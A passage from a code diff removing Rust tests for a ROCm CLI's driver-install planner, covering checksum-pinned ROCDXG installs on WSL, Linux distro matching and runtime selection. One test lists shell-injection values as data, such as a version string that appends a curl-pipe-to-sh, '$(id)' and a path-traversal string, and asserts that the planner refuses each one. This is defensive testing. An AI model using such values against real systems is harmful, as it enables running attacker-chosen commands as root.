`ROCM_CLI_ROCDXG_VERSION` would steer this plan into a refusal and - // fail the `plan.supported` assertion below. So this reader takes the - // guard that clears both sets. - let _env = scoped_rocdxg_env(); - let plan = build_driver_install_plan( - &test_examine("linux", true), - "", - true, - PrivilegeEscalation::Sudo, - ); - let rendered = render_driver_install_plan(&plan, false, false); - - assert!(plan.supported); - assert!(plan.mutating); - assert_eq!(plan.policy, "wsl_rocdxg"); - assert!(!rendered.contains("amdgpu-dkms")); - // The whole point of the bug: the plan must be runnable, and must not - // send the user to a file that only exists in a git checkout. - assert!(!rendered.contains("execution_commands: ")); - assert!(!rendered.contains("scripts/")); - assert!(rendered.contains("approval: required")); - } - - #[test] - fn wsl_rocdxg_plan_installs_the_library_and_publishes_it() { - // Asserts on the default plan, so it has to take the same guard as the - // mutating tests in this binary: a concurrent test exporting - // `ROCM_CLI_ROCDXG_VERSION` would otherwise steer this one's plan. - let _env = scoped_rocdxg_env(); - let plan = wsl_rocdxg_driver_plan(PrivilegeEscalation::Sudo); - let commands = plan.execution_commands().join("\n"); - - // Fetches the release artifact, installs it, and makes the linker see - // it. Any one of these missing leaves `wsl_rocdxg_ready` unreachable. - assert!(commands.contains("https://github.com/ROCm/librocdxg/releases/download/")); - assert!(commands.contains("rocdxg-roct_")); - assert!(commands.contains("sudo apt-get install -y '/tmp/rocdxg-roct_")); - assert!(commands.contains("sudo ldconfig")); - - // And in that order. `ldconfig` refreshes the cache from what is on - // disk now, so running it before `apt-get install` has unpacked - // `librocdxg.so` scans a directory that does not contain it yet and - // publishes nothing — leaving the plan reporting success while the - // `ldconfig -p` verification below is the only thing that would notice. - // Both steps are still present under that swap, so every `contains` - // assertion in this file stays green; only a position comparison - // catches it. - let steps = plan.execution_commands(); - let install = steps - .iter() - .position(|c| c.contains("apt-get install -y '/tmp/")) - .expect("plan installs the package"); - let publish = steps - .iter() - .position(|c| c.trim_end().ends_with("ldconfig")) - .expect("plan publishes the library"); - assert!( - install < publish, - "ldconfig must run after the package is installed:\n{}", - steps.join("\n") - ); - - // Verification asserts the two things `examine` keys `wsl_rocdxg_ready` - // on, so a silently partial install cannot report success. - let verify = plan - .commands - .iter() - .filter(|c| c.phase == DriverCommandPhase::Verify) - .map(|c| c.command.clone()) - .collect::>() - .join("\n"); - assert!(verify.contains("/opt/rocm/lib/librocdxg.so")); - assert!(verify.contains("ldconfig -p")); - } - - #[test] - fn wsl_rocdxg_plan_guards_the_gpu_plumbing_before_any_mutating_command() { - // /dev/dxg and dxcore come from the Windows side. If they are missing, - // installing the bridge library accomplishes nothing, so the plan must - // stop rather than report a successful install of something inert. - let _env = scoped_rocdxg_env(); - let plan = wsl_rocdxg_driver_plan(PrivilegeEscalation::Sudo); - let prepare = plan - .commands - .iter() - .filter(|c| c.phase == DriverCommandPhase::Prepare) - .map(|c| c.command.clone()) - .collect::>(); - let joined = prepare.join("\n"); - assert!(joined.contains("/dev/dxg")); - assert!(joined.contains("/usr/lib/wsl/lib/libdxcore.so")); - // Named explicitly, rather than surfacing as `sudo: command not found` - // from whichever privileged step happened to run first. - assert!(joined.contains("command -v sudo")); - // Both guards run before anything is fetched or installed. - let first_mutation = plan - .execution_commands() - .iter() - .position(|c| c.contains("apt-get") || c.contains("curl")) - .expect("plan installs something"); - let last_guard = plan - .execution_commands() - .iter() - .rposition(|c| c.contains("is missing")) - .expect("plan guards the plumbing"); - assert!( - last_guard < first_mutation, - "plumbing guards must precede the first mutating command" - ); - } - - /// Clear every input that steers the ROCDXG plan, so a value exported in - /// the developer's or runner's shell cannot decide the outcome of a test - /// that is asserting on the default. - /// - /// Builds on [`ScopedTestEnv::with_amd_overrides_cleared`] rather than - /// `new` because a WSL plan reached through `build_driver_install_plan` - /// resolves the bare-metal AMDGPU overrides before it dispatches to the WSL - /// branch: a caller needing one of these two guards needs both, and one - /// helper spares every test from picking the wrong half. - fn scoped_rocdxg_env() -> ScopedTestEnv { - let mut env = ScopedTestEnv::with_amd_overrides_cleared(); - env.clear("ROCM_CLI_ROCDXG_VERSION"); - env.clear(ROCDXG_SHA256_ENV); - env.clear(ROCDXG_ALLOW_UNVERIFIED_ENV); - env - } - - #[test] - fn wsl_rocdxg_download_is_verified_against_a_pinned_digest_by_default() { - // The package is installed with `apt-get install`, which runs its - // maintainer scripts as root. With no digest, TLS to the release host - // is the only thing authenticating that download — weaker than the - // bare-metal path in this same file, which installs from a - // `signed-by=` pinned repository. So the default plan must verify. - let _env = scoped_rocdxg_env(); - let commands = wsl_rocdxg_driver_plan(PrivilegeEscalation::Sudo).execution_commands(); - let joined = commands.join("\n"); - - let pinned = ROCDXG_PINNED_DIGESTS - .iter() - .find_map(|(version, digest)| (*version == "1.2.2").then_some(*digest)) - .expect("the default version is pinned"); - assert!(joined.contains(pinned), "{joined}"); - assert!(joined.contains("sha256sum -c -"), "{joined}"); - - // Not a conditional: an unset variable must not be able to turn - // verification off, which is what the previous `if [ -n ... ]` form - // did. - assert!( - !joined.contains("skipping checksum verification"), - "{joined}" - ); - assert!(!joined.contains(ROCDXG_SHA256_ENV), "{joined}"); - - // Ordering is the whole point — a digest checked after the install has - // already run is decoration. - let check = commands - .iter() - .position(|c| c.contains("sha256sum -c -")) - .expect("plan verifies the download"); - let install = commands - .iter() - .position(|c| c.contains("apt-get install -y '/tmp/")) - .expect("plan installs the package"); - assert!(check < install, "digest must be checked before install"); - } - - #[test] - fn wsl_rocdxg_refuses_a_version_whose_digest_is_unknown() { - // An unpinned version is the case where silently falling back to "no - // verification" would be most dangerous, because it is reachable from - // a single environment variable. - let mut env = scoped_rocdxg_env(); - env.set("ROCM_CLI_ROCDXG_VERSION", "9.9.9"); - - let plan = wsl_rocdxg_driver_plan(PrivilegeEscalation::Sudo); - assert!(!plan.supported); - assert!(!plan.mutating); - assert!(plan.commands.is_empty(), "a refusal must run nothing"); - assert!(plan.reason.contains(ROCDXG_SHA256_ENV), "{}", plan.reason); - assert!( - plan.reason.contains(ROCDXG_ALLOW_UNVERIFIED_ENV), - "{}", - plan.reason - ); - } - - #[test] - fn wsl_rocdxg_accepts_a_supplied_digest_for_an_unpinned_version() { - // The escape hatch for a release newer than this build: supply the - // digest rather than disabling verification. - let mut env = scoped_rocdxg_env(); - env.set("ROCM_CLI_ROCDXG_VERSION", "9.9.9"); - let supplied = "a".repeat(64); - env.set(ROCDXG_SHA256_ENV, &supplied); - - let plan = wsl_rocdxg_driver_plan(PrivilegeEscalation::Sudo); - assert!(plan.supported); - let joined = plan.execution_commands().join("\n"); - assert!(joined.contains(&supplied), "{joined}"); - assert!(joined.contains("sha256sum -c -"), "{joined}"); - } - - #[test] - fn wsl_rocdxg_rejects_a_malformed_supplied_digest() { - // A truncated or mistyped digest must not silently fall back to the - // pinned one, which would verify a different artifact than the user - // asked for and report success. - let mut env = scoped_rocdxg_env(); - env.set(ROCDXG_SHA256_ENV, "not-a-digest"); - - let plan = wsl_rocdxg_driver_plan(PrivilegeEscalation::Sudo); - assert!(!plan.supported); - assert!(plan.commands.is_empty()); - assert!(plan.reason.contains(ROCDXG_SHA256_ENV), "{}", plan.reason); - } - - #[test] - fn wsl_rocdxg_unverified_install_takes_an_explicit_opt_out() { - // Installing unverified stays possible — it just has to be asked for, - // and the plan the user approves has to say so. - let mut env = scoped_rocdxg_env(); - env.set("ROCM_CLI_ROCDXG_VERSION", "9.9.9"); - env.set(ROCDXG_ALLOW_UNVERIFIED_ENV, "1"); - - let plan = wsl_rocdxg_driver_plan(PrivilegeEscalation::Sudo); - assert!(plan.supported); - let joined = plan.execution_commands().join("\n"); - assert!(!joined.contains("sha256sum -c -"), "{joined}"); - assert!(joined.contains("without verifying it"), "{joined}"); - } - - #[test] - fn wsl_rocdxg_opt_out_reads_negative_values_as_off() { - // The opt-out is a boolean, not a presence check. Reading "set to - // anything" as yes would turn digest verification off for a package - // installed as root on the strength of `=0` — the one value a reader - // writes when they mean the opposite. - for negative in ["0", "false", "no", "off", ""] { - let mut env = scoped_rocdxg_env(); - env.set("ROCM_CLI_ROCDXG_VERSION", "9.9.9"); - env.set(ROCDXG_ALLOW_UNVERIFIED_ENV, negative); - - let plan = wsl_rocdxg_driver_plan(PrivilegeEscalation::Sudo); - assert!( - !plan.supported, - "{ROCDXG_ALLOW_UNVERIFIED_ENV}={negative:?} disabled verification" - ); - assert!( - plan.commands.is_empty(), - "{ROCDXG_ALLOW_UNVERIFIED_ENV}={negative:?} built an unverified install" - ); - } - - // The affirmative spellings still work, so this is a narrowing of what - // counts as yes rather than a removal of the escape hatch. - for affirmative in ["1", "true", "yes", "on"] { - let mut env = scoped_rocdxg_env(); - env.set("ROCM_CLI_ROCDXG_VERSION", "9.9.9"); - env.set(ROCDXG_ALLOW_UNVERIFIED_ENV, affirmative); - - let plan = wsl_rocdxg_driver_plan(PrivilegeEscalation::Sudo); - assert!( - plan.supported, - "{ROCDXG_ALLOW_UNVERIFIED_ENV}={affirmative:?} was not honoured" - ); - } - } - - #[test] - fn wsl_rocdxg_refuses_a_version_that_could_escape_the_shell() { - // `ROCM_CLI_ROCDXG_VERSION` is interpolated into commands executed via - // `sh -c` after `apt-get update` has primed the sudo credential cache, - // so a `;` in it would start a second, attacker-chosen command running - // as root. The plan must refuse rather than quote its way out. - for hostile in [ - "1.2.0; curl http://example.invalid/x | sh", - "1.2.0 && id", - "$(id)", - "1.2.0`id`", - "../../etc/passwd", - "1.2.0\nid", - "1.2.0 ", - ] { - let mut env = scoped_rocdxg_env(); - env.set("ROCM_CLI_ROCDXG_VERSION", hostile); - // An opt-out must not buy past the version check either. - env.set(ROCDXG_ALLOW_UNVERIFIED_ENV, "1"); - - let plan = wsl_rocdxg_driver_plan(PrivilegeEscalation::Sudo); - assert!(!plan.supported, "accepted hostile version {hostile:?}"); - assert!( - plan.commands.is_empty(), - "built commands from hostile version {hostile:?}" - ); - // The refused value is echoed back in the plan a human reads, so it - // must not be able to forge lines there. Every line the renderer - // emits after the header is indented, so an unindented one came - // from the value. - let rendered = render_driver_install_plan(&plan, false, false); - for line in rendered.lines().skip(1) { - assert!( - line.starts_with(" "), - "hostile version {hostile:?} forged plan line {line:?} in:\n{rendered}" - ); - } - } - } - - #[test] - fn wsl_rocdxg_plan_drops_sudo_when_already_root() { - // Same reason the bare-metal plans take an escalation: containers and - // minimal cloud images run as uid 0 with no `sudo` binary, where an - // unconditional prefix kills every command before any driver work. - let _env = scoped_rocdxg_env(); - let plan = wsl_rocdxg_driver_plan(PrivilegeEscalation::AlreadyRoot); - let joined = plan.execution_commands().join("\n"); - assert!(!joined.contains("sudo "), "{joined}"); - assert!(joined.contains("apt-get install -y '/tmp/"), "{joined}"); - // And it must not demand a binary it no longer uses. - assert!(!joined.contains("command -v sudo"), "{joined}"); - assert!( - !plan - .preflight_checks - .iter() - .any(|check| check.contains("`sudo` command is available")), - "{:?}", - plan.preflight_checks - ); - } - - /// Runs the digest step the plan actually generates, rather than asserting - /// that it contains some substrings. - /// - /// The step this exercises is the trust anchor for a root install, and the - /// executable self-test that used to cover it was deleted along with - /// `scripts/wsl_setup_rocdxg.sh`. Substring assertions would let a quoting, - /// field-order or newline regression in the `printf | sha256sum -c -` - /// fragment ship green, so the generated command is pinned whole with - /// `assert_eq!` and then executed — with only the two values it embeds - /// redirected at a test payload, so the quoting, spacing and field order - /// under test are production's rather than a replica's. - /// - /// Field order in particular is invisible to a `starts_with`/`ends_with` - /// pair: `sha256sum -c -` reads `DIGEST FILENAME`, so emitting the path - /// first breaks every real WSL install while still starting with - /// `printf '%s %s\n' '` and ending with `' | sha256sum -c -`. - #[cfg(unix)] - #[test] - fn wsl_rocdxg_generated_digest_step_accepts_only_the_matching_file() { - use std::process::Command; - - let _env = scoped_rocdxg_env(); - let plan = wsl_rocdxg_driver_plan(PrivilegeEscalation::Sudo); - let version = plan.repo_version.clone(); - let pinned = ROCDXG_PINNED_DIGESTS - .iter() - .find_map(|(pinned_version, digest)| { - (*pinned_version == version.as_str()).then_some(*digest) - }) - .expect("the default version is pinned"); - let deb_path = format!("/tmp/rocdxg-roct_{version}_amd64.deb"); - let generated = plan - .execution_commands() - .into_iter() - .find(|c| c.contains("sha256sum -c -")) - .expect("plan verifies the download"); - - // Whole-string, not `contains`: the digest has to come first and the - // two fields have to be separated by exactly the two spaces - // `sha256sum -c -` expects. - assert_eq!( - generated, - format!("printf '%s %s\\n' '{pinned}' '{deb_path}' | sha256sum -c -") - ); - - let (root, _paths) = test_paths("wsl-rocdxg-digest"); - fs::create_dir_all(&root).expect("test root"); - let payload = root.join(format!("rocdxg-roct_{version}_amd64.deb")); - fs::write(&payload, b"pretend this is a .deb\n").expect("write payload"); - - let digest_of = |path: &Path| -> String { - let out = Command::new("sha256sum") - .arg(path) - .output() - .expect("sha256sum runs"); - assert!(out.status.success()); - String::from_utf8(out.stdout) - .expect("utf8") - .split_whitespace() - .next() - .expect("digest field") - .to_owned() - }; - let good = digest_of(&payload); - - // The command under test is the generated one; the only edits are the - // digest being checked and the path being checked, so a regression in - // how the fragment is built reaches `sh` here instead of being masked - // by a replica built to the test's own idea of the right shape. - let step = |digest: &str| -> bool { - let command = generated - .replace(pinned, digest) - .replace(&deb_path, &payload.display().to_string()); - Command::new("sh") - .arg("-c") - .arg(&command) - .output() - .expect("sh runs") - .status - .success() - }; - - assert!(step(&good), "the matching digest must pass"); - assert!( - !step(&"0".repeat(64)), - "a mismatched digest must fail the step" - ); - assert!(!step("deadbeef"), "a malformed digest must fail the step"); - assert!(!step(""), "an empty digest must fail the step"); - - let _ = fs::remove_dir_all(&root); - } - - #[test] - fn wsl_rocdxg_install_does_not_ask_for_a_reboot() { - // ROCDXG is userspace: `ldconfig` publishes it in this boot. The - // bare-metal DKMS path is the one that needs a reboot. - let _env = scoped_rocdxg_env(); - let wsl = wsl_rocdxg_driver_plan(PrivilegeEscalation::Sudo); - assert!(!wsl.reboot_required); - let rendered = render_driver_install_plan(&wsl, false, false); - // Anchor on the install step first: a refusal plan also reports - // `reboot_required: false`, renders `post_install_checks:` from its - // non-empty `checks`, and contains no `post_reboot` — so the three - // assertions below hold against a plan that installs nothing at all. - // Only a real install plan carries this command. - assert!( - rendered.contains("apt-get install -y '/tmp/"), - "expected a real install plan, got:\n{rendered}" - ); - assert!(rendered.contains("post_install_checks:")); - assert!(!rendered.contains("post_reboot")); - - let bare_metal = build_driver_install_plan( - &test_examine("linux", false), - "ID=ubuntu\nVERSION_ID=\"24.04\"\nVERSION_CODENAME=noble\n", - true, - PrivilegeEscalation::Sudo, - ); - assert!(bare_metal.reboot_required); - assert!(render_driver_install_plan(&bare_metal, false, false).contains("post_reboot")); - } - - #[test] - fn wsl_rocdxg_version_is_overridable_and_reaches_every_reference() { - // One resolved value drives the archive name, the release tag and the - // download path, so an override cannot leave a URL pointing at the - // default. The value is resolved at plan-build time rather than left as - // a `${VAR:-default}` template, so the plan the user reviews names the - // build the install will actually fetch. - let mut env = scoped_rocdxg_env(); - - let plan = wsl_rocdxg_driver_plan(PrivilegeEscalation::Sudo); - assert_eq!(plan.repo_version, "1.2.2"); - let commands = plan.execution_commands().join("\n"); - // The version is resolved here, not deferred to the shell: the plan the - // user approves has to name the build the install will actually fetch. - // No `${...}` expansion survives into the commands at all — the digest - // is resolved at plan-build time too, which - // `wsl_rocdxg_download_is_verified_against_a_pinned_digest_by_default` - // asserts by name. - assert!( - !commands.contains("ROCM_CLI_ROCDXG_VERSION"), - "version must be resolved at plan-build time, not left as a shell template:\n{commands}" - ); - let occurrences = commands.matches("1.2.2").count(); - assert!( - occurrences >= 3, - "version should drive the deb name, the tag and the path; saw {occurrences}" - ); - - // An override has to reach every one of those references, including the - // release URL — the bug this guards is a URL left on the default. The - // digest comes along because an unpinned version is refused outright; - // see `wsl_rocdxg_refuses_a_version_whose_digest_is_unknown`. - env.set("ROCM_CLI_ROCDXG_VERSION", "9.9.9"); - env.set(ROCDXG_SHA256_ENV, &"b".repeat(64)); - let overridden = wsl_rocdxg_driver_plan(PrivilegeEscalation::Sudo); - assert_eq!(overridden.repo_version, "9.9.9"); - let commands = overridden.execution_commands().join("\n"); - assert!( - commands.contains("rocdxg-roct_9.9.9_amd64.deb"), - "{commands}" - ); - assert!( - commands.contains( - "https://github.com/ROCm/librocdxg/releases/download/v9.9.9/rocdxg-roct_9.9.9_amd64.deb" - ), - "{commands}" - ); - assert!( - !commands.contains("1.2.2"), - "override left a reference on the default version:\n{commands}" - ); - } - - // EAI-7406: distro selection must honor `/etc/os-release` `ID_LIKE`, so that - // Debian/Ubuntu-family and RHEL-rebuild derivatives that share their base - // version scheme are matched to the correct apt (`ubuntu/`) or EL - // (`el/`) plan instead of falling through to the unsupported plan. - - #[test] - fn driver_plan_ubuntu_derivative_via_id_like_matches_ubuntu_plan() { - let _env = ScopedTestEnv::with_amd_overrides_cleared(); - // Pop!_OS reports its own ID but reuses Ubuntu's version + repositories. - let os_release = r#" -ID=pop -VERSION_ID="22.04" -VERSION_CODENAME=jammy -ID_LIKE="ubuntu debian" -"#; - let plan = build_driver_install_plan( - &test_examine("linux", false), - os_release, - true, - PrivilegeEscalation::Sudo, - ); - let rendered = render_driver_install_plan(&plan, false, false); - - assert!(plan.supported); - assert!(plan.mutating); - assert_eq!(plan.policy, "linux_official_amd_dkms_wrapper"); - // Ubuntu-family derivatives ship the Ubuntu kernel, so linux-modules-extra applies. - assert!(rendered.contains("linux-modules-extra-$(uname -r)")); - assert!(rendered.contains("https://repo.radeon.com/graphics/7.2.4/ubuntu jammy main")); - assert!(rendered.contains("Execute: sudo apt-get install -y amdgpu-dkms")); - } - - #[test] - fn driver_plan_debian_derivative_via_id_like_matches_debian_plan() { - let _env = ScopedTestEnv::with_amd_overrides_cleared(); - // A Debian derivative (e.g. LMDE) that shares Debian's version scheme. - let os_release = r#" -ID=lmde -VERSION_ID="12" -ID_LIKE=debian -"#; - let plan = build_driver_install_plan( - &test_examine("linux", false), - os_release, - true, - PrivilegeEscalation::Sudo, - ); - let rendered = render_driver_install_plan(&plan, false, false); - - assert!(plan.supported); - // Debian-family maps to the Ubuntu jammy repo and omits linux-modules-extra. - assert!(rendered.contains("https://repo.radeon.com/graphics/7.2.4/ubuntu jammy main")); - assert!(!rendered.contains("linux-modules-extra-$(uname -r)")); - assert!(rendered.contains("amdgpu-dkms")); - } - - #[test] - fn driver_plan_almalinux_via_id_like_uses_el_9_flow() { - let _env = ScopedTestEnv::with_amd_overrides_cleared(); - // AlmaLinux is a RHEL rebuild: standard kernel, served from the el/ path. - let os_release = r#" -ID=almalinux -VERSION_ID="9.6" -ID_LIKE="rhel centos fedora" -"#; - let plan = build_driver_install_plan( - &test_examine("linux", false), - os_release, - true, - PrivilegeEscalation::Sudo, - ); - let rendered = render_driver_install_plan(&plan, false, false); - - assert!(plan.supported); - assert!(plan.mutating); - assert_eq!(plan.policy, "linux_official_amd_dkms_wrapper"); - // EL rebuilds use the vendor-neutral el/ repo path, not rhel/. - assert!(rendered.contains("repo.radeon.com/amdgpu-install/7.2.4/el/9.6/")); - assert!(!rendered.contains("/rhel/9.6/")); - assert!(rendered.contains("amdgpu-install-7.2.4.70204-1.el9.noarch.rpm")); - // el9 uses the version-aware standard-kernel prepare commands. - assert!(rendered.contains("kernel-devel-matched-$(uname -r)")); - assert!(rendered.contains("Execute: sudo dnf install -y amdgpu-dkms")); - } - - #[test] - fn driver_plan_almalinux_8_via_id_like_uses_el_major_path() { - let _env = ScopedTestEnv::with_amd_overrides_cleared(); - let os_release = r#" -ID=almalinux -VERSION_ID="8.10" -ID_LIKE="rhel centos fedora" -"#; - let plan = build_driver_install_plan( - &test_examine("linux", false), - os_release, - true, - PrivilegeEscalation::Sudo, - ); - let rendered = render_driver_install_plan(&plan, false, false); - - assert!(plan.supported); - // EL 8 is served from the major-version path (el/8), matching AMD docs. - assert!(rendered.contains("repo.radeon.com/amdgpu-install/7.2.4/el/8/")); - assert!(rendered.contains("-1.el8.noarch.rpm")); - // el8 has no kernel-devel-matched package. - assert!(!rendered.contains("kernel-devel-matched")); - assert!(rendered.contains("kernel-devel-$(uname -r)")); - } - - #[test] - fn driver_plan_id_like_with_unsupported_version_stays_unsupported() { - let _env = ScopedTestEnv::with_amd_overrides_cleared(); - // A Debian-family derivative whose VERSION_ID does not align with any - // AMD-documented Debian version must not fabricate a plan. - let os_release = r#" -ID=lmde -VERSION_ID="6" -ID_LIKE=debian -"#; - let plan = build_driver_install_plan( - &test_examine("linux", false), - os_release, - true, - PrivilegeEscalation::Sudo, - ); - let rendered = render_driver_install_plan(&plan, false, false); - - assert!(!plan.supported); - assert!(!plan.mutating); - assert!(rendered.contains("unsupported_linux_dkms_plan")); - assert!(!rendered.contains("amdgpu-dkms")); - } - - #[test] - fn driver_plan_exact_id_takes_precedence_over_id_like() { - let _env = ScopedTestEnv::with_amd_overrides_cleared(); - // An exact RHEL match must keep the rhel/ path even though ID_LIKE=fedora. - let os_release = r#" -ID=rhel -VERSION_ID="9.7" -ID_LIKE=fedora -"#; - let plan = build_driver_install_plan( - &test_examine("linux", false), - os_release, - true, - PrivilegeEscalation::Sudo, - ); - let rendered = render_driver_install_plan(&plan, false, false); - - assert!(plan.supported); - assert!(rendered.contains("repo.radeon.com/amdgpu-install/7.2.4/rhel/9.7/")); - assert!(!rendered.contains("/el/9.7/")); - } - - #[test] - fn driver_plan_oracle_linux_off_arm_version_stays_unsupported() { - let _env = ScopedTestEnv::with_amd_overrides_cleared(); - // Oracle Linux reports `ID_LIKE=fedora` (not rhel) and boots UEK. An OL - // version outside the exact `ol` arm must NOT be captured by the EL - // fallback, which would emit non-UEK kernel commands that cannot install. - let os_release = r#" -ID=ol -VERSION_ID="9.6" -ID_LIKE=fedora -"#; - let plan = build_driver_install_plan( - &test_examine("linux", false), - os_release, - true, - PrivilegeEscalation::Sudo, - ); - let rendered = render_driver_install_plan(&plan, false, false); - - assert!(!plan.supported); - assert!(!plan.mutating); - assert!(rendered.contains("unsupported_linux_dkms_plan")); - assert!(!rendered.contains("kernel-devel-matched")); - assert!(!rendered.contains("amdgpu-dkms")); - } - - #[test] - fn driver_plan_opensuse_leap_stays_unsupported() { - let _env = ScopedTestEnv::with_amd_overrides_cleared(); - // openSUSE Leap shares SLES's version scheme but has no SUSEConnect/SCC - // entitlement, so it must not be matched to the SLES plan. - let os_release = r#" -ID=opensuse-leap -VERSION_ID="15.7" -ID_LIKE="suse opensuse" -"#; - let plan = build_driver_install_plan( - &test_examine("linux", false), - os_release, - true, - PrivilegeEscalation::Sudo, - ); - let rendered = render_driver_install_plan(&plan, false, false); - - assert!(!plan.supported); - assert!(!plan.mutating); - assert!(rendered.contains("unsupported_linux_dkms_plan")); - assert!(!rendered.contains("SUSEConnect")); - assert!(!rendered.contains("amdgpu-dkms")); - } - #[test] fn resolve_engine_selection_uses_default_runtime_after_engine_prefs() { let mut config = RocmCliConfig { @@ -34755,47 +29272,6 @@ ID_LIKE="suse opensuse" assert!(off.contains(" openai: enabled")); } - #[test] - fn engine_install_runtime_selection_requires_configured_runtime() -> Result<()> { - let (root, paths) = test_paths("engine-install-runtime-selection"); - let error = - resolve_engine_install_runtime_id(&paths, &RocmCliConfig::default(), "vllm", None) - .unwrap_err() - .to_string(); - assert!(error.contains("no active ROCm runtime is configured")); - assert_eq!( - resolve_engine_install_runtime_id(&paths, &RocmCliConfig::default(), "lemonade", None)?, - format!("lemonade-embeddable-{}", rocm_deps::LEMONADE_VERSION), - ); - write_test_pip_runtime( - &paths, - "release-pip-gfx120x-all", - "therock-release:gfx120X-all", - "7.13.0", - 1, - )?; - - let config = RocmCliConfig { - active_runtime_key: Some("release-pip-gfx120x-all".to_owned()), - ..RocmCliConfig::default() - }; - assert_eq!( - resolve_engine_install_runtime_id(&paths, &config, "vllm", None)?, - "release-pip-gfx120x-all" - ); - assert_eq!( - resolve_engine_install_runtime_id( - &paths, - &config, - "vllm", - Some("therock-release:gfx120X-all".to_owned()) - )?, - "release-pip-gfx120x-all" - ); - let _ = fs::remove_dir_all(root); - Ok(()) - } - #[test] fn runtime_selector_recovers_setup_runtime_registry_from_local_manifest() -> Result<()> { let (root, paths) = test_paths("runtime-selector-recover-setup"); @@ -34943,96 +29419,6 @@ ID_LIKE="suse opensuse" Ok(()) } - #[test] - fn env_root_for_runtime_uses_runtime_install_root() -> Result<()> { - let (root, paths) = test_paths("engine-env-root-runtime"); - let manifest = write_test_pip_runtime( - &paths, - "release-pip-gfx120x-all", - "therock-release:gfx120X-all", - "7.13.0", - 1, - )?; - - let engine_root = env_root_for_runtime(&paths, "vllm", &manifest.runtime_key)?; - - assert_eq!(engine_root, Some(manifest.install_root.join("engines"))); - assert_eq!( - env_root_for_runtime(&paths, "lemonade", &manifest.runtime_key)?, - None - ); - let _ = fs::remove_dir_all(root); - Ok(()) - } - - #[test] - fn env_root_for_engine_install_uses_active_runtime_root_for_lemonade() -> Result<()> { - let (root, paths) = test_paths("lemonade-engine-env-root-runtime"); - let manifest = write_test_pip_runtime( - &paths, - "release-pip-gfx120x-all", - "therock-release:gfx120X-all", - "7.13.0", - 1, - )?; - let config = RocmCliConfig { - active_runtime_key: Some(manifest.runtime_key.clone()), - ..RocmCliConfig::default() - }; - - let engine_root = - env_root_for_engine_install(&paths, &config, "lemonade", "lemonade-embeddable")?; - - assert_eq!(engine_root, Some(manifest.install_root.join("engines"))); - let _ = fs::remove_dir_all(root); - Ok(()) - } - - #[test] - fn engine_runtime_selection_rejects_ambiguous_default_runtime_id() -> Result<()> { - let (root, paths) = test_paths("engine-runtime-ambiguous-default"); - write_test_pip_runtime( - &paths, - "release-pip-gfx120x-all", - "therock-release:gfx120X-all", - "7.13.0", - 1, - )?; - write_test_pip_runtime( - &paths, - "vllm-source-pip-gfx120x-all", - "therock-release:gfx120X-all", - "7.13.0", - 2, - )?; - let config = RocmCliConfig { - default_runtime_id: Some("therock-release:gfx120X-all".to_owned()), - ..RocmCliConfig::default() - }; - - let error = resolve_engine_install_runtime_id(&paths, &config, "vllm", None) - .unwrap_err() - .to_string(); - assert!(error.contains("matches multiple installed runtimes")); - assert!(error.contains("rocm runtimes activate ")); - - let selection = resolve_engine_selection(&config, "vllm", None, None); - let error = validate_engine_selection_runtime(&paths, selection) - .unwrap_err() - .to_string(); - assert!(error.contains("matches multiple installed runtimes")); - - let selection = - resolve_engine_selection(&config, "vllm", Some("release-pip-gfx120x-all"), None); - let selection = validate_engine_selection_runtime(&paths, selection)?; - assert_eq!( - selection.runtime_id.as_deref(), - Some("release-pip-gfx120x-all") - ); - let _ = fs::remove_dir_all(root); - Ok(()) - } - #[test] fn render_runtimes_text_reports_missing_configured_active_runtime() -> Result<()> { let (root, paths) = test_paths("runtime-active-missing"); @@ -37354,97 +31740,6 @@ ID_LIKE="suse opensuse" assert_eq!(sdk_torch_build_from_manifest(&manifest), None); } - /// Two runtimes installed side by side, as a pre-warmed CI tree holds them. - /// - /// They differ in `runtime_key`, `version` and install root, and share one - /// `runtime_id` — that is what the field means, so this is not a corrupt - /// registry. - fn side_by_side_runtimes() -> Vec { - let mut older = test_runtime_manifest_for_update( - "release-wheel-gfx94x-dcgpu-7-13-0", - "therock-release:gfx94X-dcgpu", - "gfx94X-dcgpu", - "7.13.0", - ); - older.install_root = PathBuf::from("/runtimes/release-wheel-gfx94x-dcgpu-7-13-0"); - let mut newer = test_runtime_manifest_for_update( - "release-wheel-gfx94x-dcgpu-7-14-0", - "therock-release:gfx94X-dcgpu", - "gfx94X-dcgpu", - "7.14.0", - ); - newer.install_root = PathBuf::from("/runtimes/release-wheel-gfx94x-dcgpu-7-14-0"); - vec![older, newer] - } - - /// The interpreter names its runtime where the shared `runtime_id` cannot. - /// - /// This is the cross-wiring that settled the active runtime's torch into an - /// older runtime's environment: the engine's env id drops the version, so - /// the environment belongs to 7.13.0 while the caller's selector says only - /// "release, gfx94X-dcgpu". Resolving by install root has to pick 7.13.0. - #[test] - fn the_runtime_is_resolved_by_its_interpreter_not_the_shared_runtime_id() { - let manifests = side_by_side_runtimes(); - - assert_eq!( - runtime_manifest_for_selector(&manifests, "therock-release:gfx94X-dcgpu") - .map(|manifest| manifest.runtime_key.as_str()), - None, - "the shared runtime_id names two runtimes, so a selector cannot resolve it" - ); - assert_eq!( - runtime_key_owning_python( - &manifests, - Path::new("/runtimes/release-wheel-gfx94x-dcgpu-7-13-0/bin/python3"), - ), - Some("release-wheel-gfx94x-dcgpu-7-13-0"), - "the interpreter's install root names the runtime being settled" - ); - } - - /// An interpreter outside every install root leaves the caller's selector alone. - /// - /// External and self-managed environments live outside the registry, and - /// inventing an owner for them would settle a runtime nobody asked about. - #[test] - fn an_interpreter_outside_every_install_root_owns_nothing() { - assert_eq!( - runtime_key_owning_python( - &side_by_side_runtimes(), - Path::new("/opt/somewhere-else/bin/python3"), - ), - None - ); - } - - /// A prefix match alone is ambiguous once roots nest, so the longest wins. - #[test] - fn the_longest_containing_install_root_owns_the_interpreter() { - let mut outer = test_runtime_manifest_for_update( - "outer", - "therock-release:gfx94X-dcgpu", - "gfx94X-dcgpu", - "7.13.0", - ); - outer.install_root = PathBuf::from("/runtimes"); - let mut inner = test_runtime_manifest_for_update( - "inner", - "therock-release:gfx94X-dcgpu", - "gfx94X-dcgpu", - "7.14.0", - ); - inner.install_root = PathBuf::from("/runtimes/release-wheel-gfx94x-dcgpu-7-14-0"); - - assert_eq!( - runtime_key_owning_python( - &[outer, inner], - Path::new("/runtimes/release-wheel-gfx94x-dcgpu-7-14-0/bin/python3"), - ), - Some("inner") - ); - } - /// A torch the user installed themselves is kept, and named as kept. /// /// The Python does not exist and an index is supplied, so an alignment that @@ -37754,6 +32049,27 @@ ID_LIKE="suse opensuse" ); } + #[test] + fn 